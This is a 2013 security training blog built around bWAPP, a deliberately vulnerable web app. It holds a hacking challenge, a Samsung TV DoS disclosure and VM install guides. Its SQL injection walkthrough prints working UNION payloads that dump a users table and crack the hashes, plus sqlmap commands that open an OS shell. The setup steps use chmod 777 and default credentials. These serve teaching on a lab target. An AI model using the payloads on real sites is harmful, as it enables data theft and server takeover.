Sunday, December 22, 2013

bWAPP - Xmas Hacking Challenge

Hi little bees, do you get bored in the Christmas Holidays? No panic, stay tuned with us... this time we are organizing a free bWAPP Xmas Hacking Challenge. Nothing to win, just for fun (and for educational purposes of course).

bWAPP, or a buggy web application, is a deliberately insecure web application.
It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares to conduct successful penetration testing and ethical hacking projects. What makes bWAPP so unique? Well, it has over 60 web bugs! bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!

Are you ready to get started with our Xmas Hacking Challenge? First of all, we need YOUR public IP address. E-mail us your public IP address at bWAPP [at] itsecgames.com. Once we receive your IP, we add you on our white-list and we e-mail you back all the details. Now you are ready to roll!

Tweet your solutions, findings, and screenshots to @MME_IT #bWAPP


The first five tweeters who successfully accomplished a challenge are listed on our bWAPP Hack Hall of Fame.



[ CHALLENGE 1 ]

Bug to exploit: SQL Injection - Extracting Data


A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands (sources: OWASP).



 
Your first mission is to grab and crack Santa's password using SQL injection.
A user 'Santa Claus' was added in the bWAPP database. We need the clear text password of that user...
Tweet your solutions, findings, and screenshots to @MME_IT #bWAPP.

HINT: title='+or+1+union+select+1,2,3,4,5,6,7+--+


Hack Hall of Fame:

  1. Pen Duick, @_SaxX_
  2. Twan, @TwanSec
  3. Yaser Faraj, @yaserfaraj
  4. philophobia, @philophobia78
  5. Andy Decramer, @AndyDecramer





[ CHALLENGE 2 ]

Bug to exploit: SQL Injection - Website Defacement


Your second mission is to upload a file using SQL injection. Name the file [your_name]-sqli.htm and tweet a screenshot as proof to @MME_IT #bWAPP.

Good luck... this will probably be your first (legal) website defacement!

HINT: use an automated SQL injection tool like sqlmap. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


Hack Hall of Fame:

  1. Twan, @TwanSec
  2. Pen Duick, @_SaxX_
  3. Yaser Faraj, @yaserfaraj
  4. philophobia, @philophobia78
  5. Andy Decramer, @AndyDecramer






[ CHALLENGE 3 ]

Bug to exploit: Server-Side Includes (SSI) Injection - Website Defacement


SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.

It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like: < ! # = / . " - > and [a-zA-Z0-9]

Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.

In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the web server process owner.

The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server. The web server parses and executes the directives before supplying the page. Then, the attack result will be viewable the next time that the page is loaded for the user's browser (sources: OWASP).

Your third mission is to create a file using SSI injection. Name the file [your_name]-ssii.htm and tweet a screenshot as proof to @MME_IT #bWAPP. Another website defacement...


Hack Hall of Fame:

  1. Twan, @TwanSec
  2. Pen Duick, @_SaxX
  3. philophobia, @philophobia78
  4. Yaser Faraj, @yaserfaraj
  5. Andy Decramer, @AndyDecramer





[ CHALLENGE 4 ]

Bug to exploit: Server-Side Includes (SSI) Injection - Spawning a Shell


Your next mission is to spawn a command shell using SSI injection. Access the /etc/passwd file from the shell, and tweet a screenshot as proof to @MME_IT #bWAPP.

HINT: our firewall is blocking only incoming traffic...


Hack Hall of Fame:

  1. Twan, @TwanSec
  2. philophobia, @philophobia78
  3. Yaser Faraj, @yaserfaraj
  4. ...
  5. ...





Saturday, August 3, 2013

Samsung TV DoS vulnerability

Recently, I discovered a DoS vulnerability on some Samsung TV devices.

The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request, and as a results, the TV reboots...

This was tested successfully on my Samsung PS50C7700 plasma TV.



CVE Number: CVE-2013-4890
Exploit Download Link: http://www.mmeit.be/exploits/samsungtv_reset.txt

In the demo, the TV is connected by Ethernet cable to a home network, and after running the exploit against the TVs IP address - a few seconds later, the TV restarts and repeats the process.

 
 
This means that a potential attacker only needs to obtain access to the LAN that the TV has joined, in order to attack it. This can be done either by breaking into a wireless access point or by infecting a computer on the same network with malware.

Feel free to make a root exploit and to hack your Samsung TV...

No we need firewall and antivirus protection for our televisions too :)
Samsung did not immediately return a request for comment. A shame...

Other articles related to this vulnerability:


You can follow me on Twitter: @MME_IT

Tuesday, July 16, 2013

bee-box - Hacking & Defacing bWAPP

The bee-box is a custom Linux Ubuntu virtual machine (VM), pre-installed with bWAPP.

bee-box is compatible with VMware Player, Workstation, Fusion, and with Oracle VirtualBox. It requires zero installation!

bee-box gives you several ways to hack and deface the bWAPP website, currently there are 10 different website defacement possibilities! It's even possible to hack the bee-box, using a local privilege escalation exploit, to get full root access… Actually, with bee-box you have the opportunity to explore, and exploit, ‘all’ bWAPP vulnerabilities! Hacking, defacing and exploiting without going to jail... how cool is that?

You can download bee-box from here.



 

These are the requirements for installing bee-box:
  • Windows, Linux or Mac OS
  • VMware Player, Workstation or Fusion

An overview of the installation steps:
  • Extract the 'rar' file.
  • Double click on the VM configuration file (bee-box.vmx), or import the VM into the VMware software.
  • Start the VM. It will login automatically.
  • Check the IP address of the VM.
  • Go to the bWAPP login page. If you browse the bWAPP root directory you will be redirected. 
    example: http://[IP]/bWAPP/
    example: http://[IP]/bWAPP/login.php
  • Login with the default bWAPP credentials, or make a new user. 
    default credentials: bee/bug
  • You are ready to explore and exploit the bee!



Some additional notes:
  • Linux credentials:
    bee/bug - root/bug
  • MySQL credentials:
    root/bug
  • Modify the Postfix settings (relayhost,...) to your environment.
    config file: /etc/postfix/main.cf
  • Take a snapshot of the VM before hacking the bee-box.
    There is also a backup of the bWAPP website (/var/www/bWAPP_BAK).
  • To reinstall the bWAPP database, delete the database with phpmyadmin
    (http://[IP]/phpmyadmin/).

    Afterwards, browse to the following page: https://[IP]/bWAPP/install.php
  • Don't upgrade the Linux operating system, you will lose all fun :)
  • Check the SecurityTube (www.securitytube.net) for some amazing hacking videos.
    Thanks Vivek!

We also offer a 2-day comprehensive web security course 'Attacking & Defending Web Apps with bWAPP'.
This course can be scheduled on demand, at your location!




This project is part of the ITSEC Games project. ITSEC Games are a fun approach to IT security education. IT security, ethical hacking, training and fun... all mixed together.
You can find more about the ITSEC Games and bWAPP projects on our blog.

Enjoy!

Regards

Malik Mesellem
@MME_IT

Monday, January 21, 2013

bWAPP - SQL injection

Is bWAPP vulnerable for SQL injection? Yes of course. This is the purpose of bWAPP, our extremely buggy web application. It has some nice injection issues... I made them intentionally, remember?

No... I will not explain in detail what SQL injection is!
A SQL injection attack is probably the easiest attack to prevent, while being one of the least protected against forms of attack. The core of the attack is that a SQL command is appended to the back end, usually through of a form field in the website or web application, with the intent of breaking the original SQL statement and then running the SQL statement that was injected into the form field. I'm sure you can find enough tutorials on the Internet about SQL injection. Here's an example of a pretty nice article.

Yes... I will explain how to exploit bWAPP using SQL injection and how to take ownership of the  database and even the underlying operating system. Definitely!



Currently there are 5 bugs in bWAPP related to SQL injection:
  • the Search page,

    where you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search.
     
  • the Select page,
     
    where you can select a specific movie from a drop-down list.
     
  • the Login page,

    where you can enter your credentials to login.
     
  • the Blind SQL injection page,

    where you also can search for a movie. The application will tell you if the movie exists or not. You will not see the movie details... maybe that's the reason why I called this the Blind SQL injection page :)
     
  • and where is bug number 5?

    A little challenge for you... somewhere in the application there is an issue with a SQL insertion. It's up to you to tell us where. Please give us your feedback @MME_IT.



The Search page

Here you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search. If you click the search button without entering any search string then all movies will be displayed.



The injection symptoms: when entering a single quote (') in the title field we receive the following message:

'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1'

I love that message!

Here we go for some basic SQL injection fun:

blah' or 1=1--

results in all the records:



blah' or 1=2--

results in 0 records:



So the URL parameter title is definitely susceptible to SQL injection:

http://localhost/bWAPP/sqli_1.php?title=blah'+or+1=1--%20&action=search


What's next? Do you want to view some data not intended for you? I mean some real confidential information! Of course you want, let's go...

You could use the SQL union statement to merge database tables.
First of all you need to ensure that you use the same number of columns as the original SQL statement when using the SQL union statement!

blah' union select 1--

results in the following message:




After a while you will discover that you should use 6 columns:

 
blah' union select 1,1,1,1,1,1--

results in:



And that's great!
Now we can play with the field order and visualize the current database version:

blah' union select 1,DATABASE(),1,1,1,1-- 



We have found the name the of the current database name: bWAPP

Now our mission is to retrieve the table names of the current database:


blah' union select 1,table_name,1,1,1,1 from INFORMATION_SCHEMA.TABLES where table_schema=database()--



We have 3 tables: blog, movies and users. I think we should go for the data in the table users :)

We want to retrieve the column names for the table users:

blah' union select 1,column_name,1,1,1,1 from INFORMATION_SCHEMA.COLUMNS where table_name='users' and table_schema=database()--



The column names login, password, email and secret look interesting. We want those values!

blah' union select 1,login,password,email,secret,1 from users--



OK, we have the values! We exploited the underlying database by retrieving some confidential data. Apparently it seems that the password value is stored in a hashed state and cannot be retrieved. Those guys from MME are doing a great job...

After 10 seconds, 1 password was already cracked using John :p



Of course, we knew that the password for user bee was bug. I'm just trying to convince you to use complex passwords!

Let's summarize, we retrieved some data that was not intended for us. We retrieved the password hashes and we cracked a password. What's next?

Right... we will takeover the database and the underlying operating system. One of my favorite tools for doing that is sqlmap.

sqlmap is an open source pentesting tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections (source: sqlmap.org). It is written in python.



We can automate the previous commands with sqlmap.

This dumps the current database version and the database names:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" 
--cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --dbs




This dumps the table fields, it even cracks automatically the passwords:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0"
-D bWAPP -T users -C login,email,password,secret --dump



Using sqlmap we also have the possibility to create a shell with the underlying operating system. Actually the tool will upload a web shell that runs your favorite OS commands. A very nice and powerful tool. Thank you Bernardo and Miroslav!

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --os-shell



Conclusion

SQL injection can have disastrous consequences, no doubt about it.

Feel free to test for SQL injection vulnerabilities using the bWAPP web application. As you know there are 5 different bugs related to SQL injection. You can download bWAPP from here. Don't forget to set the security level to low or medium. With security level high you will notice that SQL injection is no longer applicable. With security level high we are validating every user input. This is done with the MySQL real escape string function and with prepared statements.

If you want to know more about SQL injection and tools like sqlmap, don't hesitate to subscribe for our ITSEC training. Or just invite me to your security event. It would be an honor for me to speak at your event!

Regards

Malik

Sunday, January 20, 2013

bWAPP - Samurai WTF

In one of the the previous articles I described the necessary steps to install bWAPP or a buggy web application. That was pretty easy.

In this article I will demonstrate the installation and configuration of bWAPP on the Samurai Web Testing Framework.

The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web penetration testing environment. The image contains the best of the open source and free tools that focus on testing and attacking websites.

 


Once you have booted Samurai WTF you can copy the bWAPP tar file to the desktop.
Extract it from here. A new directory 'bWAPP' will be created.
Syntax
cd /home/samurai/Desktop/
unzip bWAPP.zip



Move the directory 'bWAPP' and its entire content to the folder '/var/www'. You need root privileges!
Syntax
sudo su
mv /home/samurai/Desktop/bWAPP /var/www

Edit the file 'admin/settings.php'. Use the Samurai MySQL settings.
You need to change the password to 'samurai'. Yes... the password of the MySQL root user on Samurai is actually 'samurai'.



Browse to the file 'install.php' in the directory 'bWAPP'. Click 'here'.
The database 'bWAPP' will be created and populated.



Go to the login page. You can login with the default credentials (bee/bug) or you can make a new user. It's up to you!



You are ready to explore and exploit the bee!
Choose your favorite bug and a security level (low - medium - high).



If you have questions or if you want to help me with this project, don't hesitate to contact me! I speak human...

Enjoy!

Regards

Malik Mesellem
https://twitter.com/MME_IT

Monday, January 14, 2013

bWAPP - Metasploitable

In the previous article I described the necessary steps to install bWAPP or a buggy web application. That was pretty easy.

In this article I will demonstrate the installation and configuration of bWAPP on Metasploitable.

Metasploitable is an intentionally vulnerable Linux virtual machine. The VM can also be used to provide security training, test security tools, and practice common penetration testing techniques. It runs on any recent VMware product and other visualization technologies such as VirtualBox, VMFusion, Hyper-V,... Thank you HD Moore and Rapid7!



You can download the image file of Metasploitable 2 from here. The default login and password is msfadmin/msfadmin.

Once you have booted the Metasploitable VM you can copy the tar file to the temp directory. Extract it from here. A new directory 'bWAPP' will be created. 
Syntax
cd /tmp
unzip bWAPP.zip



Move the directory 'bWAPP' and its entire content to the folder '/var/www'. You need root privileges!
Syntax
sudo su
mv /tmp/bWAPP /var/www

Go to the bWAPP directory and give full permission to the directories 'passwords' and 'images'. This step is optional but it will give you so much fun when exploiting bWAPP with tools like sqlmap and Metasploit!
Syntax

chmod 777 images/
chmod 777 passwords/


Edit the file 'admin/settings.php'. Use the Metasploitable MySQL settings.
Yeah you're right, there's nothing to change. The MySQL root user on Metasploitable has a blank password.



Browse to the file 'install.php' in the directory 'bWAPP'. Click 'here'.
The database 'bWAPP' will be created and populated.



Go to the login page. You can login with the default credentials (bee/bug) or you can make a new user. It's up to you!



You are ready to explore and exploit the bee!
Choose your favorite bug and a security level (low - medium - high).



If you have questions or if you want to help me with this project, don't hesitate to contact me! I speak human...

Enjoy!

Regards

Malik Mesellem
https://twitter.com/MME_IT